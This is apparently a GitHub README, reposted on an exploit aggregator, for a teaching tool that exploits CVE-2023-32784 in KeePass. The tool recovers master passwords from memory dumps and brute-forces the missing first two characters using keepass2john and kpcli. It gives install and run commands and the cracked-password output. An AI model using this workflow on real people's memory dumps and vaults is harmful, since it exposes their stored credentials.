## https://sploitus.com/exploit?id=531DA6D8-6CE6-5EA2-9115-23DABABEBA70
# EXPLOIT_KEEPASS
A Python console program that exploits the security vulnerability CVE-2023-32784 in the password manager KeePass.
This exploit reconstructs the master password in plain text based on memory dumps (.DMP).
The program was created as part of my training at the Developer Academy and is used exclusively for teaching purposes.
It was coded on **Windows 10** using **VSCode** as code editor.
## Table of Contents
1. <a href="#technologies">Technologies</a>
2. <a href="#features">Features</a>
3. <a href="#getting-started">Getting Started</a>
4. <a href="#usage">Usage</a>
5. <a href="#additional-notes">Additional Notes</a>
## Technologies
* **Python** 3.12.2
* **argparse, subprocess, os, concurrent.futures (ThreadPoolExecutor)** (modules from standard library)
* **keepass2john** 1.9.0 (<a href="https://www.openwall.com/john/">More Information</a>)
* **kpcli** 3.8.1-1.1 (<a href="https://kpcli.sourceforge.io/">More Information</a>)
## Features
The following table shows which functions **Exploit_KeePass** supports:
| Flag | Description | Required |
| ---- | ----------- | -------- |
| -h <br> --help | Get a list of the available options | no |
| -dir | Directory containing .kdbx and .DMP file pairs | yes |
**Flow of the Program**
- Extracts .kdbx and .DMP files from the specified directory.
- Maps .DMP files to corresponding .kdbx files.
- Extracts partial master passwords (missing first two characters) from .DMP files using a customized version of **keepass-dump-masterkey**.
- <a href="https://github.com/SarahZimmermann-Schmutzler/exploit_keepass/blob/main/my_poc.py">**Customized version**</a>: The first two characters of the master password are cut off.
- <a href="https://github.com/matro7sh/keepass-dump-masterkey">**Original**</a>: The first character of the master password is missing and the second is a guess.
- Extracts hashes from .kdbx files using the **keepass2john** tool.
- **keepass2john** is a tool used to extract password hashes from KeePass password database files (usually .kdbx files). It is part of the John the Ripper (JtR) suite, a popular password-cracking tool.
- Links partial master passwords with .kdbx files based on their mapping.
- Performs a hybrid Brute-Force Attack using a wordlist with all possible character combinations for the first two elements to reconstruct the full master passwords with **kpcli**.
- **kpcli** (KeePass Command Line Interface) is a command-line tool for managing KeePass password databases (typically .kdbx files). It is written in Perl and provides a text-based interface to access, modify, and manage KeePass databases.
- Saves the results (cracked passwords) in a .potfile.
## Getting Started
0) <a href="https://docs.github.com/de/pull-requests/collaborating-with-pull-requests/working-with-forks/fork-a-repo">Fork</a> the project to your namespace, if you want to make changes or open a <a href="https://docs.github.com/de/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests">Pull Request</a>.
1) <a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/cloning-a-repository">Clone</a> the project to your platform if you just want to use the program.
- <ins>Example</ins>: Clone the repo e.g. using an SSH-Key:
```bash
git clone git@github.com:SarahZimmermann-Schmutzler/exploit_keepass.git
```
2) Install the programs **John the Ripper** because **keepass2john** is part of tis suite and **kpcli** if you haven't already:
- Linux/Ubuntu:
```bash
sudo apt update && apt upgrade
sudo apt install john kpcli
```
- Windows:
- Download John the Ripper <a href="https://github.com/openwall/john">Take a look here</a>
- Download kpcli <a href="https://sourceforge.net/projects/kpcli/">Take a look here</a>
## Usage
- Make sure you are in the folder where you cloned **Exploit_KeePass** into.
- Help! What options does the program support!?
```bash
python exploit_keepass.py -h
# or
python exploit_keepass --help
```
- To crack a KeePass master passwords using .kdbx and .DMP files use the following command in your terminal:
```bash
python exploit_keepass.py -dir [path/to/directory/with/kdbx-DMP-files]
```
- The content of the directory should look like this:
```
test1.DMP
test1.kdbx
test2.DMP
test2.kdbx
...
```
- <ins>Example</ins>: Crack the KeePass master passwords using the .kdbx and .DMP files from the directory *dumps*:
```bash
python exploit_keepass.py -dir "~/Desktop/exploit_keepass/dumps"
```
- What you see in the terminal, if the Brute-Force Attack was successful:
```
Password found for /home/User/Desktop/exploit_keepass/dumps/test1.kdbx: [password]
Password found for /home/User/Desktop/exploit_keepass/dumps/test2.kdbx: [password]
etc.
```
- What you see in the current directory, if the Brute-Force Attack was successful:
- The file `cracked_passwords.potfile` with all Hash-Password-Pairs
## Additional Notes
The **argparse** module is used to parse (read) command line arguments in Python programs. It allows to define arguments and options that can be passed to the program when starting it from the command line. These are then processed and are available in the program as variables.
**Subprocess** is a Python module that allows you to spawn new processes, connect to their input/output/error pipes, and obtain their return codes. It is used for interacting with external commands or programs from within your Python script. For example, you can use subprocess to run shell commands or external scripts, capture the output or handle the input of these commands and check the exit status of the executed commands to ensure they ran successfully.
The **os** module in Python is part of the standard library and provides functions to interact with the operating system. It allows you to perform tasks like working with files and directories, interacting with the environment, and managing processes. Key features include Functions to create, delete, and navigate files and directories, access and modify environment variables, Work with file paths and execute and manage system processes.
The **concurrent.futures** module is a standardized interface in Python that provides tools for parallel and asynchronous execution. It belongs to the standard library and provides classes and methods to execute tasks in threads or processes in parallel. **ThreadPoolExecutor** is a class that allows multiple functions or tasks to be executed in separate threads at the same time. The definition **as_completed** ist eine Funktion, die eine Liste von Future-Objekten (Ergebnisse der parallelen Aufgaben) entgegennimmt und sie in der Reihenfolge ihrer Fertigstellung liefert.
**ChatGPT** was involved in the creation of the program (Debugging, Prompt Engineering etc.).
I use **Google Translate** for translations from German into English.